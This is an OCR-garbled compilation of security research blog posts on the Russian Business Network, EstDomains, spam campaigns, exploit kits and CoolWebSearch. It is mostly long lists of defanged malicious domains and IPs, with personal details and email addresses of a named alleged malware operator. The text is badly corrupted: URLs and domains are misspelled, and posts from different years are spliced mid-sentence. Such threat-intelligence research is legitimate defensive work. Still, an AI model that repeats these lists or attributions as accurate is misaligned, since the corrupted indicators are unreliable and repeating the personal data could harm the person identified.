4. hvtp://ddanchev. blogspot. con/2006/08 copycat-ueb-nalvare-exploitation-kits.htal 
5 ee //oogs sates cox/oecmey/ eed 
6 
7 
8 
9 


. http: //ddanchev. blogspot .com/2008/04/skype-spamming-tool-in-wild.htm 
. http: //ddanchev. blogspot .com/2008/05/harvesting-youtube-usernames- for. htm 


ttp://ddanchev. blogspot .com/2008/02/uncovering-msn- social-engineering-scam.htm 


. http: //ddanchev. blogspot .com/2007/05/msn-spamming-bot . htm 
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ttp://ddanchev. blogspot .com/2008/01/diy-fake-msn-client-stealing-passwords.htm 


ttp://ddanchev. blogspot .com/2007/10/thousands- of-im-screen-names- in-wild.htm 


12. http://ddanchev. blogspot .com/2007/11/yahoo-messenger-controlled-malware.htm 


4.9.8 EstDomains and Intercage VS Cybercrime (2008-09-16 12:20) 


Windows Internet Explorer i xi 


A Dear Sir/Madam, 


You have chosen Malware Distribution as an abuse type. 
Kindly note that Estdomains is the Domain Registrar, 

not the hosting company, thus, according to the ICANN 
rules, we are dealing only with the domains, which are 
involved in Email Spam, child pornography distribution, 
or display Inaccurate Whois 

Information, We ask you not to send us any letters 
regarding the domains registered with us, which are 
involved in any other type of activity, 

The responsibility for such domains is on their 

hosting company, thus, you should better write them. 
You can Find this information using different web-services, 
we recommend you to use http: /fwww.whois.sc}, 

it gives you all information about hosting company 

when you search For a domain and after that click on IP 
address at the right of the page. 


Surreal, especially when you get to read that EstDomains has "ruthlessly suspended over five 
thousand domains only for last week", and also, that it "has a reliable ally in its battle against 
malware in a face of Intercage, Inc". 


Here’s [1]the press release : 


"The EstDomains, Inc management does not deny the fact that no one is secured from 
having a customer who uses provided services for delinquent purposes. But it must be noted 
that the carefully planned infrastructure of EstDomains, Inc makes the special provision for 
the cases of malware distribution that may originate from the domain name registered under 
the company’s name. Such domain names are suspended immediately along with domain 
holder’s account if there is an evidence of malware presence on the web site. According 
to the most recent statistics over five thousand domain names were detected and 
ruthlessly suspended by EstDomains, Inc specialists only last week. 


The company also has a reliable ally in its battle against malware in a face of 
Intercage, Inc which provides company with the hosting services of the highest 
quality. But the outstanding performance of hosting services is not the sole reason why 
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EstDomains, Inc appreciates this partnership so greatly. Intercage, Inc generously provides 
EstDomains, Inc specialists with reports regarding discovered malware vehicles. As the main 
database for additional domain name management services is located in Intercage Data 
Center, EstDomains, Inc has the perfect opportunity to get notifications of the slightest mark 
of malware presence in the shortest time and take measures in advance. " 


The press release reminds me of [2]RBN’s defacement of my blog posted on the Ist of 
April, and despite that [3]EstDomains started "performing for the community" as of recently, 
thanks to the collective intelligence and persistence of everyone turning their research into 
actionable intelligence against them, this performance aiming to minimize the effect of the 
negative PR is more or less futile considering [4]all the cybercrime activities that they’ve been 
tolerating or ignoring for the past couple of years. For future generations to see, [5]this is how 
EstDomains "performs for the community" : 


"We've suspended all the domains listed in this topic. But please don’t make posting 
these domains on this forum a habit. We have a 24/7 online tech support which can be 
contacted at [6]https://support.estdomains.com 


Best regards, 
EstDomains Team 


EstMate says : Ihatemondayand.com and antispycheck.com - both suspended. If any of 
the suspended websites are still active to you it maybe be because of your computer’s or ISP’s 
DNS-cache, others won’t be able to access these websites 


googlescanners-360.com isn’t registered with us. As for other domains, the ones, which 
were registered through us, have been suspended. Regarding our preventive measures, the 
fact that you don’t see them doesn’t mean there isn’t any. Yes, we don’t write about them but 
in most cases we suspend whole accounts with problematic domains and look for connections 
to other accounts etc. During the last week we’ve suspended over 15000 different domains." 


What’s more disturbing regarding this particular domain registrar is that it’s a U.S based 
operation, namely, using the lack of international cybercrime cooperation as an excuse for 
not taking actions earlier doesn’t fit into the picture. Moreover, this is just the tip of the 
iceberg, and taking into consideration a personal mentality that the cybercriminals you 
know are better than the cybercriminals you don’t know, the RBN or any of its "leftovers" 
aren't fully taking advantage of the tactics they could be using in order to make it harder 
to shut them down, but how come? Simply, they don’t have to put extra efforts and would 
once again remain online for years to come, which is perhaps more disturbing at the first place. 


What in the world is the Russian Business Network, is it still alive and kicking, are the 
same people that used to maintain my favorite netblock ever, still the ones running it, and 
what tactics are they taking advantage of in order to make it harder for the community to 
establish direct links with a particular netblock and the RBN itself? 


With RBN’s "leftovers" - InterCage, Inc., Softlayer Technologies, Layered Technologies, 
Inc., Ukrtelegroup Ltd, Turkey Abdallah Internet Hizmetleri, and Hostfresh - making head- 
lines just like the way it should be, what I’ve been researching for the past couple of months 
is how they’ve migrated from the centralized hosting provider to what appears to be a fully 
operational franchise. The business model is very simple, the RBN through its extensive 
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underground networking skills supplies to customers to franchisers operating small anti-abuse 
netblocks across the globe, where they offer dedicated hosting and share revenue with the 
RBN. Anyone trusted enough and capable of supplying such netblocks starts running the RBN 
anti-abuse franchise. It’s also worth pointing out that these franchises are in fact starting 
to cut the middle man, and disintermediate the RBN by actively advertising their services in 
order for them to create a self-sustainable business model without having to rely on the RBN 
connecting them with customers. 


What used to be a centralized cybercrime powerhouse operating several highly visible 
anti-abuse netblocks, is today’s decentralized infrastructure, with the profit margins for the 
anti-abuse services that it’s logically capable to break-even and earn profits even with a 
few high profile dedicated hosting customers. Anyone can be the Russian Business Network, 
gain experience into the market segment, then disintermediate them by starting to advertise 
their own services. From a powerhouse to a franchise model, what the RBN had to offer can 
be easily duplicated by a countless number of local RBN’s, and this is only starting to take place. 


Related posts: 

[7]Lazy Summer Days at UkrTeleGroup Ltd. 

[8]The Malicious ISPs you Rarely See in Any Report 
[9]Geolocationg Malicious ISPs 

[10]The New Media Malware Gang - Part Four 

[11]The New Media Malware Gang - Part Three 

[12]The New Media Malware Gang - Part Two 

[13]The New Media Malware Gang 

[14]HACKED BY THE RBN! 

[15]Rogue RBN Software Pushed Through Blackhat SEO 
[16]RBN’s Phishing Activities 

[17]RBN’s Puppets Need Their Master 

[18]RBN’s Fake Account Suspended Notices 

[19]A Diverse Portfolio of Fake Security Software 
[20]Go to Sleep, Go to Sleep my Little RBN 
[21]Exposing the Russian Business Network 
[22]Detecting the Blocking the Russian Business Network 
[23]Over 100 Malwares Hosted on a Single RBN IP 
[24]RBN’s Fake Security Software 

[25]The Russian Business Network 


ttp://www.domainnews.com/en/general/estdomains-denies-1links-to-malware-distribution. htm 


1. 
2. 
3. 
4 

5. 
6. ins. 
7. - 
8. 
9. 


ttps://support .estdomains.com/ 
ttp://ddanchev. blogspot .com/2008/07/lazy-summer-days-at-ukrtelegroup-1tds.htm 


ttp://ddanchev.blogspot.com/2008/06/malicious-isps-you-rarely-see-in-any .htm 


ttp://ddanchev.blogspot.com/2008/02/geolocating-malicious-isps.htm 
10. http: //ddanchev. blogspot . com/2008/03/new-media-malware-gang-part-four.htm 
11. http://ddanchev. blogspot .com/2008/02/new-media-malware-gang-part-three.htm 


12. http://ddanchev. blogspot .com/2007/12/new-media-malware-gang-part-two.htm 
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including the following Web site which is he known to have been offering around various 
cybercrime-friendly forum communities as a template - hxxp://wholesale-dress[.]net which is 
currently owned and managed by hxxp://counterfeittechnology[.]Jcom including the following 
domains known to have been registered by the same individual that registered the original 
domain: 


[3] 


opensib[.]com 
fotonota[.]me 
bartrans[.]net 
nebolsina[.]Jcom 
digitalreality[.]world 
digitalrealty[.]world 
whitecrow[.]club 
opensib[.]club 
vkfoto[.Jorg 
vkfoto[.]net 


vkfoto[.]biz 
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foto2u[.]info 
foto2u[.]org 
foto2u[.]net 
foto2u[.]biz 

foto4u[. ]biz 
photo2u[.]biz 

gospace[. ]biz 
aircitypost[.]Jcom 
youhavedownloaded[.]Jcom 
xmllogistic[.]Jorg 
mega-battery[.]com 
aramzam[.]com 
allforlaptop[.]Jcom 
soirot[.]Jcom 
mailingtechnology[.]info 
mailingtechnology[.]org 
counterfeit[.]technology 
xmllogistic[.]net 
xmllogistic[.Jcom 
ftn-presentation[.]com 
counterfeittechnology[.]com 
toskanmarket[.]Jcom 
identificationninja[.]com 
mrboating[.]com 
ironsyssecurity[.]com 
danandnadial.]us 
xmlshop[.]biz 
shopxml[. ]biz 
xmlshop[.]Jus 
shopxml[.]us 
mrboating[.]us 
mrboating[.]biz 
xmlshop[.Jorg 
shopxml[. Jorg 
mrboating[.]org 
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13, fntp://adanchev ‘blogspot con/2007/1i/aew-nedia-~nalware-qang. heal 
| http:/ /adanchey. blogepot .con/2008/04/nacked-by-rbn. ht 
_netp:/ /adanchev. blogspot .con/2008/03/rogue-rbn-sottware-pushed- through tal 
16, hetp://adanchev blogspot ,con/2006/02/rns-phishing- activities. neal 
| http:/ /adanchey. blogepot .con/2008/02/zhns-nalvare-puppets-need-their~aaster tal 
_netp:/ /adanchev blogspot .con/2008/08/rons-fake-account~suspended-notices. a 


http: //ddanchev.blogspot.com/2007/12/diverse-portfolio-of-fake-security.htm 


. http: //ddanchev. blogspot .com/2007/11/go-to-sleep- go-to-sleep-my-little-rbn.htm 


. http: //ddanchev. blogspot. com/2007/11/exposing-russian-business-network.htm 


. http: //ddanchev. blogspot .com/2007/11/detecting-and-blocking-russian-business.htm 


23. http: //ddanchev. blogspot . com/2007/10/over- 100-malwares—hosted-on-single-rbn. htm 
24. http://ddanchev. blogspot .com/2007/10/rbns-fake-security-software.htm 
25. http://ddanchev. blogspot .com/2007/10/russian-business-network. htm 


4.9.9 Spam Campaign Abusing Yahoo’s Services (2008-09-17 15:34) 


Search Shortcuts 


@ My Photos 
#\ My Attachments 


http: /Awww, nxxpkqbo, com 


sq bk jun 
ADVERTISEMENT 
REPLAY 
YAHOO! AUTOS CAR FINDER. 


THE INTUITIVE WAY TO FIND 
YOUR NEXT CAR. 


> Start Your Search 


Delete | Reply ~ | Forward | Spam | Move... ¥ | 


Previous | Next | Back to Messages 


Check Mail L. —— [ 
http://www. yahoo.com/searchjsearch;_ylt=?p=J) IM foalestay {I NICLCCLOIELLE LC $22 90000000) 


Think spammers.Yahoo.com trusts Yahoo.com, consequently, a spam campaign that using 
bogus Yahoo.com email accounts, and spamming only Yahoo users with links to Yahoo’s search 
engine using queries leading to the exact soammer’s URLs, is almost 100 % sure to make it 
through spam filters. That seems to be case with this spam campaign perfectly fitting into the 
"spam that made it through" category. 


Sample search queries resulting in a single result with the spammer’s URL : 

-  yahoo.com////MMNMIMMIMMI///search/search; _ylt=?p=())))))))))))))callfold((((((_ ((((- 
(((((()))))))) CCE O))))))5000)))))) ICCC ( 

- search.yahoo.com/search?p=(((((())))))))  (CC(((((((((((housetear((((())))  ))C(C(C((())) CCC 
((5000((((((()))))))))))))))) )))) 
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dressinus[.]us 


dressywomen[.]Jcom 


bridalcorn[. Jorg 


promdressesuk[.]org 


lafemmedresses2015[.]Jorg 


sherrihilldress[.Jorg 


cheap-dressuk[.]Jorg 


talkdressprom[.]org 


promdressbee[.]us 


weddingdresshotsale[.]org 


mypromdressstore[. Jorg 


sweetymalada[.]us 


onlydress[.]Jorg 


promdressstores[.]org 


promdressesshop[. org 


addressingmachines[.]org 


dresskey[.]org 


justdress[.]org 


[4] 
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Sample personally identifiable information on Yevgeniy Igorevich Polyanin also known as 
LK4D4, Damnating, Dam2life, Noodlleds, Antunpitre, Affilate 23: 


Email: damnating@yandex[.]ru, antunpitre@gmail[.]Jcom 


The following email account - antunpitre@gmail[.]Jcom is known to have registered an android 
malware C &C server in the past (hxxp://foto2u[.]biz) - 209[.]99[.]40[.]224; 209[.]99[.]17[.]27; 
178[.]32[.]152[.]214; 5[.]254[.]113[.]102) which is known to have been serving the following 
malicious MD5 (7a140b4835e9ed857edalf0dbfbfa3e8) and once executed is known to have 
phoned back to the following malicious C &C server domain - hxxp://phoneactivities[.]com 
- 103[.]232[.]215[.]133 including the following related malicious and fraudulent C &C server 
domains: 


hxxp://vkfoto[.]org 
hxxp:// vkfoto[.]net 
hxxp:// vkfoto[.]biz 
hxxp:// foto2u[. ]info 
hxxp:// foto2u[.]org 
hxxp:// foto2u[.]net 
hxxp:// foto2u[.]biz 
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hxxp:// photo2u[. ]biz 
Stay tuned! 


1 
2. https://www. justice. gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya 

3. 
4. 


18.1.25 Exposing a Currently Active CoolWebSearch Domains Portfolio - An OSINT 
Analysis (2022-01-27 09:29) 


[1] 


m: CW Shredder - CoolWebsearch Trojan Remover V2.18 OX 


“TREND MICRO’CWShredder' = 


Please wait while your system is scanned. 


Resuk 

CWS. AFF, Winshow Not Present 
j ot Present 
t Present 

ot Present 
ot Present 

t Present 

jot Present 
Not Present 
Not Present 
Not Present 
Not Present 
Not Present 


fi 
Cc 
Cc 
ch 
c 
c 


owe 
CWS 


Dear blog readers, 


I’ve decided to share with everyone a currently active portfolio of rogue and malicious CoolWeb- 
Search IPs with the idea to help everyone in their cyber attack attribution campaign including 
cyber threat actor attribution campaigns. 


Sample currently active rogue and malicious CoolWebSearch domains portfolio: 


008i[.]com 
008k[.]Jcom 
OOhq[.]Jcom 
010402[.]com 
O5p[.]Jcom 
Ocalories[.]net 
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Ocat[.Jcom 

Ocj[.]Jnet 
100gal[.]net 
100sexlinks[.]com 
101lottery[.]Jcom 
1089288654 
10money[.]us 
123keno[.]com 
130[.]94[.172[.]17 
143fuck[.]Jcom 
157[.]238[.]62[.]14 
171203[.]Jcom 
193[.]125[.]201[.]50 
195[.]190[.]118[.]140 
195[.]225[.]176[.]14 
195[.]225[.]176[.]31 
195[.]225[.]177[.]13 
195[.]225[.]177[.]8 
198[.]65[.]164[.]168 
198[.]65[.]164[.]170 
198[.]65[.]164[.J171 
1Icheck[.]us 
1cost[.]us 
1-domains-registrations[.]com 
lLloss[.]us 

Lpill[.Jus 

1-se[.Jcom 

1se[.]ru 
1lsexparty[.]Jcom 
1stfind[.]com 
1lstpagehere[.]Jcom 
lweight[.Jus 
2020search[.]com 
203[.]199[.]200[.]61 
205[.]177[.]122[.]27 
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205[.]177[.]122[.]30 
205[.]177[.]124[.]66 
206[.]161[.]127[.174 
206[.]161[.]192[.]166 
206[.]161[.]200[.]105 
206[.]161[.]207[.199 
209[.]50[.]252[.]95 
209[.]66[.]114[.]130 
209[.]66[.]122[.]177 
209[.]8[.]161[.]52 
209[.]8[.]161[.]53 
209[.]8[.]161[.]54 
213[.]158[.]119[.]18 
213[.]159[.]117[.]131 
213[.]159[.]117[.]132 
213[.]159[.]117[.]133 
213[.]159[.]117[.]134 
213[.]159[.]117[.]150 
213[.]159[.]117[.]235 
213[.]159[.]117[.]236 
213[.]159[.]117[.]237 
213[.]159[.]117[.]53 
213[.]159[.]118[.]226 
213[.]159[.]118[.]228 
213[.]159[.]118[.]235 
213[.]219[.]251[.]78 
213[.]219[.]251[.]80 
213[.]219[.]251[.]81 
216[.]115[.]95[.]98 
216[.]65[.]101[.]250 
216[.]65[.]3[.]68 
21century-mp3[.]nu 
24teen[.]Jcom 
2awm|[.]Jcom 


2fastsearch[.]net 
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30search[.]Jcom 
31234[.]Jcom 
3466690378 
3466709097 
34yo[.]Jcom 
3510794929 
356563[.]net 
356563[.]net 
3624716320 
36site[.]Jcom 
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With CAPTCHA solving and automatic account registration getting easier to outsource next 
to the easily obtainable [1]segmented email databases of a particular ISP or web based 
email service provider, launching such a campaign requires less efforts than it used to before. 
Interestingly, the spammed through Yahoo emails never leave Yahoo Mail since it’s only 
spamming Yahoo users according to the extensive number of emails CC-ed. 


What’s to come in the long-term? With an entire spamming infrastructure build on the 
foundation of the hundreds of thousands of bogus accounts at legitimate services, spammers 
are already starting to embrace the "legitimate sender" mentality and are working on ways to 
integrate that infrastructure in their spam systems, evidence of which can be seen in several 
[2]different managed spamming services. 


Related posts: 

[3]Microsoft’s CAPTCHA successfully broken 

[4]Gmail, Yahoo and Hotmail’s CAPTCHA broken by spammers 
[5]Spam coming from free email providers increasing 
[6]Inside India’s CAPTCHA solving economy 


1. http: //ddanchev. blogspot .com/2008/05/segment ing-and-localizing- spam. htm 
2. http://blogs.zdnet .com/security/?p=1899 

3. http://blogs.zdnet .com/security/?p=1232 

4. http://blogs.zdnet .com/security/?p=1418 
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We're slowly entering into "can you find the ten similarities" stage in respect to web malware 
exploitation kits, and their coders continuous supply of copycat malware kits under different 
names, taking advantage of different exploits combination. [1]Copycat web malware exploita- 
tion kits are faddish, however, from a strategic perspective, releasing exploits kits like this 
one [2]covered by Trustedsource, consisting entirely of PDF exploits, can greatly increase the 
exploitability level of Adobe vulnerabilities in general. 
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Tene: Today 


A similar web malware exploitation kit, once again using only Adobe related exploits is Zopa. 
Have you seen this layout before? That’s the very same layout [3]MPack and [4]lcePack were 
using, were in the sense of cybercriminals preferring to use much mode modular alternatives 
these days. Ironically, Zopa is more expensive than MPack and IcePack, with the coder trying 
to cash-in on its biased exclusiveness and introduction stage buzz generated around it. 
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The second web malware exploitation kit is relying on a mix of exploits targeting patched 
vulnerabilities affecting IE, Firefox and Opera, with its authors asking for $50 for monthly 
updates, updates of what yet remains unknown. Both of these kits once again demonstrate 
the current mentality of the kit’s coders having to do with - thankfully - zero innovation, fast 
cash and no long-term value. 


However, modularity, convergence with traffic management kits, vertical integration with cy- 
bercrime services and bullet proof hosting providers, advanced metrics, [5]evasive practices, 
improved OPSEC (operational security), and dedicated cybercrime campaign optimizing staff, 
are all in the works. 


Related posts: 
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[8]Pinch Vulnerable to Remotely Exploitable Flaw 
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Thanks to misconfigured traffic management kits, not taking advantage of all the built-in 
features that could have made a research a little bit more time consuming, here are the latest 
fake security software domains popping up at the end of fake adult content sites : 
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The Diverse Portfolio of Fake Security Software series are prone to continue taking a 
bite out of cybercrime, and the people who distribute them on a affiliation based revenue 
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216[.]127[.]33[.]119 
216[.]127[.]33[.]119 
216[.]127[.]33[.]25 
216[.]127[.]33[.]68 
216[.]127[.]33[.192 
216[.]127[.]33[.]92 
216[.]127[.]74[.]127 
216[.]127[.]74[.]162 
216[.]127[.]74[.]162 
216[.]130[.]185[.]122 
216[.]130[.]185[.]122 
216[.]130[.]187[.]150 
216[.]130[.]187[.]150 
216[.]130[.]187[.]150 
216[.]131[.]78[.]241 
216[.]131[.]86[.]213 
216[.]133[.]243[.]131 
216[.]133[.]246[.]137 
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216[.]150[.]27[.]21 
216[.]158[.]129[.]77 
216[.]158[.]129[.]77 
216[.]158[.]129[.]77 
216[.]158[.]129[.]77 
216[.]158[.]129[.]77 
216[.]158[.]129[.]77 
216[.]158[.]129[.]77 
216[.]158[.]129[.]77 
216[.]158[.]129[.]77 
216[.]158[.]129[.]77 
216[.]168[.]224[.]70 
216[.]17[.]108[.]202 
216[.]194[.]70[.]7 
216[.]195[.]34[.]102 
216[.]195[.]34[.]195 
216[.]195[.]35[.]34 
216[.]195[.]37[.]115 
216[.]22[.]28[.]49 
216[.]22[.]46[.]193 
216[.]22[.]46[.]193 
216[.]22[.]46[.]193 
216[.]22[.]46[.]193 
216[.]22[.]46[.]193 
216[.]240[.]137[.]40 
216[.]240[.]137[.]41 
216[.]251[.]43[.]11 
216[.]251[.]43[.]11 
216[.]35[.]187[.]246 
216[.]40[.]33[.]117 
216[.]52[.]184[.]239 
216[.]52[.]184[.]240 
216[.]55[.]137[.]54 
216[.]55[.]168[.]3 
216[.]55[.]176[.]22 
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216[.]65[.]38[.]226 
217[.]11[.]48[.]101 
217[.173[.]65[.]232 
217[.]73[.]65[.]232 
217[.]73[.]66[.]1 
218[.]214[.]123[.]52 
219[.]129[.]216[.]39 
219[.]129[.]216[.]39 
Stay tuned! 


1. https: //blogger .googleusercontent .com/img/a/AVvXsEj 2Cm5tqL5xzRo5ipRqUbbCvBpn3LpausiC9xUrc1412QxQ72TKLX7ml1A 
IKGZtmRVonY_dHHqfknXoLCC jPqO0CspnQXK5TimyNW4j_q3nCGCrm: 


18.1.26 Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains 
Portfolio - Part Two - An OSINT Analysis (2022-01-28 14:07) 


[1] 


e"CWShredder - CoolWebSearch Trojan Remover v2.18 (X 


“TREND MICRO’CWShredder'= 


Please wait while your system is scanned. 


ned Resuk 
CWS. AFF. Winshow Not Present 
CWS. AFF. .Madfinder Not Present 
CWS. AFF. Tooncomics Not Present 
CWS. AFF, Toolband Not Present 
CWS. SysTine Not Present 
CWS. HomeSearch 


Not Present 
Not Present 
Not Present 


Dear blog readers, 


I’ve decided to share with everyone yet another batch of currently active rogue and malicious 
CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution cam- 
paigns including cyber threat actor attribution campaigns. 


Sample currently active rogue and malicious CoolWebSearch domains portfolio: 
smartupdater[.]Jcom 
cash[.]pornocruto[.]nu 
pornocruto[.]nu 
ADASEARCH[.]COM 
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ELITE-VIDEO-FEEDS[.]COM 
FUCKING-MACHINE[.]NET 
GREATDILDOS[.]COM 
TEEN-NUDE-PICTURE[.]COM 
BDSM-INC[.JCOM 
BOYS-GROUP[.]COM 
BOYS-INC[.JCOM 
COOL-PANTYHOSE[.]COM 
GAYS-CLUB[.]JCOM 
GAYS-INC[.]COM 
GET-GAY[.]COM 
HENTAI-INC[.]COM 
ILLEGALAREA|.]COM 
ILLEGALDOMAIN[.]COM 
LESBIAN-INC[.]COM 
MATURE-INC[.]COM 
MATURES-CLUB[.]COM 
MY-SHEMALE[.]COM 
PANTYHOSE-INC[.]COM 
PANTYHOSE-NOW|[.]JCOM 
PANTYHOSE-SITE[.]COM 
PANTYNOW[.]COM 
PICS-LAND[.]COM 
PICS-PLANETCOM 
PISSING-INC[.JCOM 
PISSING-SITE[.]COM 
PORNO-CENTER[.]COM 
PORNO-INC[.JCOM 
REAL-PISSING[.]COM 
SUPER-GAYS[.]COM 
TEEN-NOW[.]COM 
TEENS-CASTLE[.]COM 
TEENS-GROUP[.]COM 
THE-ANIME[.]COM 
THE-BDSM[.]COM 
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THE-HENTAI[.]COM 
THE-PANTY[.]JCOM 
THE-PISSING[.JCOM 
THE-THUMBS[.]COM 
THE-TRANNY[.JCOM 
THE-UPSKIRT[.]JCOM 
THUMBS-INC[.]JCOM 
THUMBS-LAND[.]COM 
THUMBSWEB[.]COM 
UPSKIRT-INC[.JCOM 
VOYEUR-GROUP[.]COM 
VOYEUR-INC[.JCOM 
X-PANTY[.]COM 
X-PISSING[.]JCOM 
X-TRANNY[.]COM 
X-UPSKIRT[.]COM 
XXX-PISSING[.]JCOM 
YOUR-GAY[.]COM 
YOURLESBIAN[.]JCOM 
YOURSHEMALE[.]COM 
topsearch10[.]com 
lickitquick[.]com 
AETEST[.]JINFO 
coolmature[.]net 
BONBON[.]NET 
HOTPOP[.JCOM 
PHREAKER[.]NE 
PUNKASS[.]COM 
SEXMAGNET[.]COM 
TOUGHGUY[.]NET 
OO0O0info[.]com 
008i[.]com 
0-29[.]Jcom 
0-2u[.]Jcom 


0-days[.]net 
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609[.]Jcom 

75tz[.]Jcom 

8ad[.Jcom 

ad25[.Jcom 
ad45[.]Jcom 
ad77[.]com 
ad86[.Jcom 
get-access[.]com 
get-certified[.]net 
get-data[.]net 
get-faster[.]com 
go-acct[.]Jcom 
go-advertising[.]Jcom 
go-all[.]Jcom 
icansearch[.]net 
find-itnow[.]Jcom 
just[.]find-itnow[.Jcom 
smarttrade[.]Jallyes[.]com 
mtreexxx nl 
host2010[.]com 
ssl4all[.Jcom 
OUTHOST[.]JINFO 
SMARTDNS[.]ORG 
Browse[.]ifriends[.]net 
wwwfinder[.]net 
connect[.]online-dialer[.]com 
installs rdgUS1115[.]Jexe 
online-dialer[.Jcom 
searchfind[.]info 
63[.]246[.]131[.]19 
damcash[.]com 
gate[.]damcash[.]com 
smartpops[.]Jcom 
bdsm-dialer[.]Jcom 
eliteshells[.Jnet 
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$50 in this particular case, however, keeping in mind that the email harvester is anything but 
ethical, this very same database will be sold and re-sold more times than the original buyer 
would like to know about. Moreover, what someone is offering for sale, may in fact be already 
available as a value-added addition to a managed spamming service. 


With metrics and quality assurance applied in a growing number of spam and phishing 
campaigns, filling in the niche of email harvesting by distinguishing between different types 
of obfuscated emails by releasing an easily embeddable module, was an anticipated move. 
What’s to come? [1]Spam and malware campaigns across social networks "as usual" will 
propagate faster thanks to the ongoing harvesting of usernames within social networks, that 
would later on get imported in Web 2.0 "marketing" tools targeting the high-trafficked sites 
and automatically spamming them. 


From a spammer’s perspective, geolocating these 250k emails could increase their sell- 
ing prices since the buyers would be able to launch localized attacks with messages in the 
native languages of the receipts. Is the demand for quality email databases fueling the 
developments of this market segment, or are the spammers self-serving themselves and 
cashing-in by reselling what they’ve already abused a log time ago? That seems to be the 
case, since there’s no way a buyer could verify the freshness of the harvested emails database 
and whether or not it has already been abused. 
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umaxlogin[.]com 
hightcalldialer[.]Jcom 
umaxsearch[.]com 
iefeadsl[.]com 
RF104[.]COM 
AMATEURFORALL[.]COM 
searchmeup[.]com 
searchfind[.]com 
64[.]127[.]104[.]144 
wegcash[.]com 
free[.]wegcash[.]com 
findwhatevernow[.]com 
sweatysmut[.]Jcom 
softwareoutfit[.]Jcom 


mp3u[.]com 


locator[.]imagesrvr[.]com 


download[.]centralserver[.]net 


alhimik[.Jcom 
greg-search[.]Jcom 


popuptoast[.]Jcom 


CHINAEXPRESSJIDLA[.]COM 


userlands[.]Jcom 
adult-profit[.]Jcom 
clickzs[.]com 
cz6[.]clickzs[.]Jcom 
cz7[.]clickzs[.]Jcom 
vip[.]clickzs[.]Jcom 
thumberland[.]com 
xxx-goto[.]net 
therealsearch[.]com 
CASH4TOOLBAR[.]COM 
MSUPDATER[.]COM 
MSUPDATER[.]NET 
MSUPDATER[.]ORG 


searchmiracle[.]com 
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SEARCHMYREQUEST[.]COM 

adamsupportgroup[.]org 

tonsporn[.]Jcom 

webcounter[.]cc 

gallerytaboo[.Jcom 

wofldsex[.]Jcom 

showebway|[.]com 

erolux[.]Jcom 

little-lady[.]net 

axistek[.]com 

free32[.]com 

thoughtconvergence[.]com 

interneteraser[.]Jcom 

maxcash[.]COM 

maximumcash[.]com 

adultprovide[.Jcom 

nastydollars[.]Jcom 

updates[. ]adultprovide[.Jcom 
clicks[.]nastydollars[.]Jcom 

inthevip[.]Jcom 

mikesapartment[.]com 

welivetogether[.]com 

gxb[.]nastydollars[.]Jcom 

mailwiper[.]Jcom 

ptssa[.]net 

123-search[.]net 
353-fjusj-fd5mfjw-jw-8463287-8gjd878-7x-O0qqO0[.]Jcom 
4545kj-dfdf4-586hkc53-215864jjf-n6myOw14a8[.]Jcom 
75ghs987|mciqogn0387jfmshs73m398e84n438dn3[.]com 
867ktnshb-5309-ht047nbut0-48jtmdsl-7200jrtnids[.]Jcom 
click2medial[.]net 

media-search[. ]net 

scourweb[. ]net 

search[.]search-exe[.]com 

search-assist[.]net 
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searchduckie[. ]net 
searchenhancement[.]com 
search-exe[.]com 
searchnetworks[.]net 
sidebarsearch[.]com 
windowenhancer[.]com 
thesexmail[.]Jcom 
jpeghunter[.]Jcom 
XxXx3x[.]com 
lovely-mature[.]com 
galleries[.]thematurehardcore[.]com 
xxxmovielinks[.]net 
offendale[.Jcom 
karupspc[.]Jcom 
home[.Jadultcash[.]Jcom 
ads[.]adultcash[.]com 
adultcash[.]Jcom 
yellow500[.]Jcom 
hqstorm[.]Jcom 
name15[.]com 
w3matter[.]com 
hot-search[.]com 
usO1[.]xmlsearch[.]findwhat[.]Jcom 
spydeleter[.]Jcom 
66[.]150[.]55[.]135/sk/s/1/ 
secret-keeper[.]com 
freeezinebucks[.]com 
e-finder[.]cc 
fast-look[.]com 
partypoker[.]Jcom 
allaboutsearching[.]Jcom 
ISEARCHHERE[.]COM 
IWANTOSEARCH[.]COM 
MYSEARCHNOW|[.]COM 
SEARCHWEB2[.]COM 
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SEARCHWEBNOW|[.]COM 
netsearchsoft[.]com 
Ohyea[.]org 
OMEGASEARCH[.]COM 
OPENSEARCH[.]ORG 
PROSEARCHING[.]COM 
search-aide[.Jcom 
simplyvids[.]com 

isprime[.Jcom 
firstbookmark[.Jcom 
dialerplatform[.]Jcom 
GLOBAL-ACCES[.]COM[.] 
GLOBAL-ACCESS[.]COM 
trafficjuicer[.]com 
66[.]230[.]145[.]49/gt[.]html 
redpersonals[.]Jcom 
xxxgateway[.]Jcom 
pictureheaven[.]com 
pornoverview[.]com 
66[.]230[.]164[.]180/jsclick[.]php 
66[.]230[.]164[.]182/click[.]php 
lookfindgo[.]Jcom 
PASSIONGALLERIES[.]COM 
searchgalleries[.]com 
sesupport[.]com 

ruworld[.]com 
marketbanker[.]com 
snakevideos[.]com 
66[.]230[.]172[.]112/click[.]php 
66[.]230[.]172[.]113[.]click[.]php 
66[.]230[.]172[.]115/click[.]php 
dlO[.]netreplicator[.]Jcom 
netreplicator[.]Jcom 
netcathost[.]Jcom 
66[.]250[.]130[.]194/mail[.Jhtm 
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allcrazyporn[.]com 
spyorgy[.]net 
thestas[.]Jcom 
approvedlinks[.]Jcom 
tooncomics[.]com 
mostsexygirls[.]com 
inettraffic[.]Jcom 
inet-traffic[.]Jcom 
searchit[.]Jcom 
FreeHomePages[.]Com 
banner2[.]inet-traffic[.]com 
delivery[.]inet-traffic[.]com 
defaultsearching[.]com 
search-and-go[.]com 
Coolwebsearch[.]com 
maximumhost[.]com 
russiankiss[.]Jcom 
ROSEXXXGARDEN[.]COM 
iweb-commerce[.]com 
barelylegalsite[.]Jcom 
coolamateursite[.]com 
coolanalsite[.]Jcom 
coolasiansite[.]Jcom 
coolfetishsite[.]com 
coolfreehost[.Jcom 
coolgaysite[.]Jcom 
coolhardcoresite[.]Jcom 
cooloralsite[.]com 
coolpaysite[.]Jcom 
dirtyhosting[.]com 
freecoolhost[.Jcom 
freehost4you[.]com 
freshlesbiansite[.]com 
freshteensite[.]Jcom 


hotfreehosting[.]com 
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maximumhosting[.]com 
freefresh[.]dirtyhosting[.]com 
freemoney[.]dirtyhosting[.]com 
bdsmbedroom[.]com 
cicamacal[.]com 
dirtycelebs[.]Jcom 
indosaru[.]Jcom 
pojoksex[.]com 

razvrat[.]net 

